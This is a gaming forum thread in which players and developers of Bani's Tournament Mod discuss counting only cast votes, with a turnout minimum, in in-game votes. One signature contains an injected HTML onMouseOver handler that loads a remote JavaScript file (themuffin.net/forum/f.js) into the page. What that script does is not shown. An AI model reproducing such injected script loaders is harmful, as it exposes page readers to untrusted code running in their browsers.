Voting feature..

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

O2.iceman

Voting feature..

Post by O2.iceman »

Was going to log it in mantis, but thought I'd post it here to get some public feedback..

It would be good to have voting tweaked so that only people who actually vote, are counted in the vote percentage. Obviously there need to be some other checks so that if only 2 people vote it won't pass, etc.

So this is what I've come up with..

b_votetimelimit "30" (30 seconds until vote expires)
b_votepass "65" (prolly don't need, can use current vote percentage cvar)
b_votemin "65" (65% of people on the server need to vote for it to count)
b_votecountvoted "1" (on means only count those people who voted)

An explanation might be best :)

Imagine a 20 player server, with 65% set to both above variables.

Someone calls a vote to kick O2.iceman.

- If 10 people vote yes, 3 people vote no and 7 people don't vote, normally this vote would not pass. But with the above settings, 65% of the people DID vote, so count those who voted, 10 to 3, which means count the 65% percentage from the 13 people that did vote, so it's a pass.

- If 2 people vote yes, noone votes no, but 18 people don't vote, the vote times out after 30 seconds and sees that the required minimum number of people to vote hasn't been met, so even though YES to NO is 2-0, not enough people voted so the vote fails.

Thoughts?
O2.iceman
Oxygen
gotenks

Post by gotenks »

that actually sounds like a good idea... cause there are alot of people who abstain from voting for reasons
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
KyleRTCW

Post by KyleRTCW »

I agree :bows:

About more then half of the server's players never vote becuase they are n00bs or for other reasons :|

But ET has this already, unless you want to make this better.
=FF=im2good4u

Post by =FF=im2good4u »

sound god caz out of my XP oe ET a vote almost failes everytime
dragon

Post by dragon »

Whilst Iceman has stolen my leet idea and explained it much better than what I did to him, how about something to ensure the game actually TELLS u what the vote is? So many times I just get a "Vote called by O2.Iceman" and it doesn't tell u what the darn thing is for.

Can this be addressed too?
=FF=im2good4u

Post by =FF=im2good4u »

how qbout adding new votes like STFU (nothing personaly)

or game speed gravity and stuff
Rain

Re: Voting feature..

Post by Rain »

O2.iceman wrote:It would be good to have voting tweaked so that only people who actually vote, are counted in the vote percentage. Obviously there need to be some other checks so that if only 2 people vote it won't pass, etc.
I had a vote mode like this on my RtCW server, and it was rather nice... I'd say that method of counting votes will make it into BayonET at the very least. It won't make it into the next release, though--we're not adding any new features until after the release, just fixing bugs.

You should open a feature request on the bug tracker for it... I'm very forgetful.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
bani
Site Admin

Post by bani »

i'm rather fond of the vote system in Tribes2. it showed little bars indicating the % of votes passed, and the threshold required to pass the vote. very clean, simple, and intuitive. not like the mess that is rtcw (and currently ET as well)